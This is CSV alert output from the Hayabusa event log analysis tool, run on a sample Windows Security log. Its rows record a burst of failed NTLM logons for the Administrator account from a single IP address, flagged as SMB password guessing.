2016-09-20 01:50:53.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YCf6WUjiS11hHqKT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1o0CTT7GsWfCWuHx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: F6Jr8XrUsmTiSdol  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Buj66iuSkLEQdKnQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: L1wOLI51HqfkgO6r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: X4oe273WXOICzkwW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:53.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1c7nGezYNJ70jR6R  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ajuZ09zGeuovCQLg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: z4k7xV7soNF4mHlz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CtdqW8zOw1GoQcvA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aY6FLi1edRZWrRZN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ah1JoKfxJzQhCCVL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gIMOZRGcv4o33BWd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nmLyLJoVZz6fJ62I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aGufqEGD4hFf2XLM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7IEdKy2H5Agblpjt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XT9k8C05GVLBNPdl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5opHh8HelCXtR5Cm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: K0dntDwYLmag9efo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.514 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UQfZOMFV9LtY7r2S  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y01v38dTUIsJEZIv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pCP8x2QBZ6IvMEnf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.739 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hgcbYjw3kKqlK7Di  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TFU97Tq3e7IWvSKm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1hUCvaS1yM2FU9AE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8JInVlBqTSfT4J1s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EjXRQUGDKBZaMkw3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fZPXNxkGOrld5eCR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:54.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OBDhSrF7DZ1KBRa8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dQ7TKJOGibAVNoCH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.054 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZE1GARxx03m4FtEL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Gf3VLLTxsK85bsrv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.123 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 58G6MFVbW55JZIV5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Yxne9LqZCqBf3qkc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ssZya6gArnuepKyW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rsDEj6o0NaKUYPZL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pELSIsupIYAxPCtv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: urHCDmdCfNexxUHf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: czGXZFukLquA9Mce  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: icWMY9pKCQMyTxJg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v28FLC2WXEXSUiI5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.510 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FwhjHww5iA51SFjp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 96BwmhKqDIojhdRA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DiRvofjwoeAdHYrv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.655 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BNLdOrPwbvYELiCc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: x15WKTspmg2ALHaY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QMoQWddkcYtCmoKm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jhTbfX42Pwn7OA2k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yXcbUCgAhVFfqLc3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.856 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GHyXVM0jpaKBiY9N  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TZoWEcU6VbEnrLpx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.939 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LIfEzNQWwvrai4ga  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DhImfqWz7SHId9hE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.014 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: s6sekQfneNE5uFtx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iEQ6KkZEHGcSgdA8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.103 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qzxJYBbM7ZMaaGOo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wO5GFBqSltNfjtQT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PdsMzjfP1ZcPju2i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2LqpKmoCX9slPXie  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ouHvw1LXTN3OSFYb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tZIB1QO7hfugceJg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u4QU2BQ0u5tJsdjG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0P7NKiKCmLvu6L1L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4obkK4RfsLZe5gdi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JRUDpDLhgop8d1el  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LvdsNkFqfFWRePXJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5wvd8c1jYrEZMcKI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AWvECxgkvWdg9Zdc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lHHPOAYSMSp3BhX7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rJicXUMfrx9BOzHI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eybrQWvrvwSkNADJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VVMPCaQB0XteDSwC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lbjjLoATZE6KPIQv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
